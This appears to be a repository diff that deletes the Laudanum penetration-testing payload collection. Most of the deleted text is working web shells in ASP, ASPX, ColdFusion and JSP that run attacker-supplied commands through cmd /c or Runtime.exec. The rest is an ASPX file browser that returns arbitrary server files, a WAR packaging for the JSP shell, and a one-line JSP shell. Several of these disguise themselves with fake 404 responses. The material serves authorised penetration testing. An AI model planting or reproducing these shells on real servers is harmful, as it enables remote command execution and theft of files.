' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' can set this to 0 for never time out but don't want to kill the server if a script
' goes into a loop for any reason
Server.ScriptTimeout = 180
ip=request.ServerVariables("REMOTE_ADDR")
if ip<>"1.2.3.4" then
response.Status="404 Page Not Found"
response.Write(response.Status)
response.End
end if
if Request.Form("submit") <> "" then
Dim wshell, intReturn, strPResult
cmd = Request.Form("cmd")
Response.Write ("Running command: " & cmd & "<br />")
set wshell = CreateObject("WScript.Shell")
Set objCmd = wShell.Exec(cmd)
strPResult = objCmd.StdOut.Readall()
response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
set wshell = nothing
end if
%>
<html>
<head><title>Laundanum ASP Shell</title></head>
<body onload="document.shell.cmd.focus()">
<form action="shell.asp" method="POST" name="shell">
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
<input type="submit" name="submit" value="Submit" />
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
<p>Example command to do a directory listing:<br>
%ComSpec% /c dir
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
Payloads/laudanum-0.8/aspx/dns.aspx
-144
View File
@@ -1,144 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
{
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
{
if (s == qType)
{
validType = true;
break;
}
}
if (!validType)
qType = "Any";
}
if (Request.Form["query"] != null)
{
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
{
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
}
}
}
</script>
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
<%
foreach (string s in qtypes)
{
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
}
%>
</select>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</body>
</html>
Payloads/laudanum-0.8/aspx/file.aspx
-154
View File
@@ -1,154 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
***
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
{
foreach (string ip in allowedIPs)
{
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
{
allowed = true;
}
}
if (!allowed)
{
die();
}
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
{
if (System.IO.File.Exists(file))
{
writefile();
}
}
}
void writefile()
{
Response.ClearContent();
Response.Clear();
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
Response.TransmitFile(file);
Response.Flush();
Response.End();
}
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
</script>
<html>
<head></head>
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
{
if (b.Length > 0)
{
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");
}
}
%>
<table>
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
<%
try
{
if (System.IO.Directory.Exists(dir))
{
string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
}
}
else
{
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
Response.End();
}
}
catch (System.UnauthorizedAccessException ex)
{
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
Response.End();
}
%>
<%
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
}
%>
</table>
</body>
</html>
Payloads/laudanum-0.8/aspx/shell.aspx
-129
View File
@@ -1,129 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system.
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
string stdout = "";
string stderr = "";
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// Check for an IP in the range we want
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIps) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
if (Request.Form["c"] != null) {
// do or do not, there is no try
//try {
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
// "/c" tells cmd that we want it to execute the command that follows, and exit.
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
//}
//catch (Exception objException)
//{
}
}
</script>
<html>
<head><title>Laundanum ASPX Shell</title></head>
<body onload="document.shell.c.focus()">
<form method="post" name="shell">
cmd /c <input type="text" name="c"/>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
Payloads/laudanum-0.8/cfm/shell.cfm
-80
View File
@@ -1,80 +0,0 @@
<cfapplication scriptProtect="none">
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
***
********************************************************************************
***
*** TODO: Fix the problem with quotes
*** Add authentication
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfif #cgi.remote_addr# neq "1.1.1.1">
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
</cfif>
<html>
<head><title>Laudanum Coldfusion Shell</title></head>
<body>
<form action="shell.cfm" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
<cfelse>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
</cfif>
<input type="submit">
</form>
<cfif IsDefined("form.cmd")>
<pre>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
</pre>
</cfif>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
Payloads/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF
-3
View File
@@ -1,3 +0,0 @@
Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.)
Payloads/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml
-11
View File
@@ -1,11 +0,0 @@
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
Payloads/laudanum-0.8/jsp/warfiles/cmd.jsp
-41
View File
@@ -1,41 +0,0 @@
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND)
return;
}
%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
Payloads/simple_shell.jsp
-3
View File
@@ -1,3 +0,0 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>
Payloads/xssproject.swf
BIN
View File
Binary file not shown.